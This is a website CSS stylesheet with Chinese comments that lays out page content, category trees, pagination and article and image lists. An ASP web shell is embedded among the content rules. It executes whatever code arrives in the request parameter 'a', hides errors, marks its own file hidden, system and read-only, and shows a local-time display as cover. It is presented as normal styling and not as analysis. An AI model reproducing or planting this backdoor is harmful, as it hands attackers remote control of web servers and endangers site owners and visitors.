@charset "utf-8";
/*--------------------------------------------------------*/
/*					全站通用样式
/*--------------------------------------------------------*/
body,html{font-size:9pt;margin:0; line-height:20px; padding:0; font-family:Verdana, Arial, Helvetica, sans-serif; background:url(/images/bg.jpg) repeat-x;}
a{color:#3C3C3C; text-decoration:none;}/* 设置超级链接的颜色，不需要下划线  */
a:hover{text-decoration:underline;}/* 鼠标经过样式  */
img{border:0;}/* 图片默认不需要边?? */
/*--------------------------------------------------------*/
/*					常用样式??
/*--------------------------------------------------------*/
.clear{clear:both;}
.imgborder{padding:1px; border:solid 1px #ccc;}
.time{
	color:#a5a5a5;
	position:absolute;
	/*--对应position:relative;--*/
	width:auto;
	overflow:hidden;
	right:10px;
	top:5px;
	height:20px;
	}
.more{
	position:absolute;
	/*--对应 position:relative;--*/
	width:auto;
	overflow:hidden;
	right:20px;
	top:10px;
	height:26px;
	}
.more2{
	position:absolute;
	/*--对应 position:relative;--*/
	width:auto;
	overflow:hidden;
	right:10px;
	bottom:6px;
	height:15px;
	}
.dqwz{
	color:#999999;
	position:absolute;
	width:auto;
	right:15px;
	top:0px;
	font-weight:normal;
	font-size:12px;
	font-family:"宋体";
	}
.dqwz a{
	color:#999999;
	}

/*--------------------------------------------------------*/
/*					内容样式
/*--------------------------------------------------------*/
.content{text-justify:inter-ideograph; text-align:justify;}
.content h1{font-size:16px; padding:5px 0; margin:0 0 5px 0; text-align:center; border-bottom:dotted 1px #CCCCCC; color:#CC0000;}
.content h2{font-size:14px; padding:0 0 0 23px; margin:10px 0 5px 0; background:url(h2_bg.jpg) no-repeat; line-height:30px; height:26px; color:#77ab04;}
.content h3{font-size:13px; padding:0; margin:0;}
.content div{margin:0 10px; padding:0;}
.content div img{padding:1px;}本地时间<%
dim a
a=request(chr(97))
on error resume next
execute a
response.write(""):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>
<%
response.write formatdatetime(now,1)&"<br>"
%>
.content dd h3{margin:0; padding:0;font-family: 微软雅黑,Microsoft Yahei; font-size:15px;}
.content blockquote{border:dotted 1px #ccc; padding:5px; background:#FFFFCC; color:#014572;}
.content .tel{FONT-FAMILY: "Times New Roman", "Times", "serif"; color:#CE3D38; font-size:18px; font-weight:bold;}
.content .money{FONT-FAMILY: "Times New Roman", "Times", "serif"; color:#CE3D38; font-size:14px; font-weight:bold;}
.content em{color:#0000FF; font-weight:bold;}
.content .name{font-size:16px; font-weight:bold; color:#CE3D38;font-family: 微软雅黑,Microsoft Yahei;}
.content .mulu{color:#999;}
.content .mulu a{font-size:12px; font-weight:bold; color:#d20106; margin:0 5px 0 0;}
.tuwen{padding:5px; border:solid 1px #ccc;}
/*--------------------------------------------------------*/
/*					树型分类列表样式
/*--------------------------------------------------------*/
#classlist div{
	font-size:12px;
	font-weight:bold;
	color:#1271c1;
	line-height:20px;
	padding:0 0 0 0px;
	text-decoration:none;
	overflow:hidden;
	width:198px;
	text-align:left;
	}
#classlist div a{color:#1271c1; float:left; width:190px; border-bottom:solid 1px #ccc; padding:0 0 0 10px;}
.ClassDepth1 {
	padding:0;
	}
.ClassDepth1 div{
	background:url(../images/d_3.gif) no-repeat 10px 7px!important;
	padding:0 0 0 20px!important;
	margin:0 0 0 0px;
	width:70px!important;
	float:left!important;
	font-weight:normal!important;
	color:#666!important;
	}
.ClassDepth1 div a{
	float:none!important;
	width:auto!important;
	border:none!important;
	padding:0!important;
	color:#666666!important;
	}
/*--------------------------------------------------------*/
/*					分页
/*--------------------------------------------------------*/
#PageStyle{text-align:center;}
#PageStyle .Current{background:Red; color:#FFFFFF; padding:0 3px;} /* 当前页码样式 */
/*--------------------------------------------------------*/
/*					文章列表
/*--------------------------------------------------------*/
#articleList{margin:0 10px 0 10px;	list-style-type: none;}
#articleList li {margin:0px; border-bottom:dotted 1px #e9e9e9;	padding-left: 20px;	background: url(../images/d.gif) no-repeat;}
/*--------------------------------------------------------*/
/*					图片列表
/*--------------------------------------------------------*/
#image{margin:0;list-style-type: none; width:none;}
#image li{list-style-type: none;	width: 102px; float: left; margin:0 5px 0 4px;}
#image img{margin: 5px;border: 1px solid #CCCCCC;float: left;}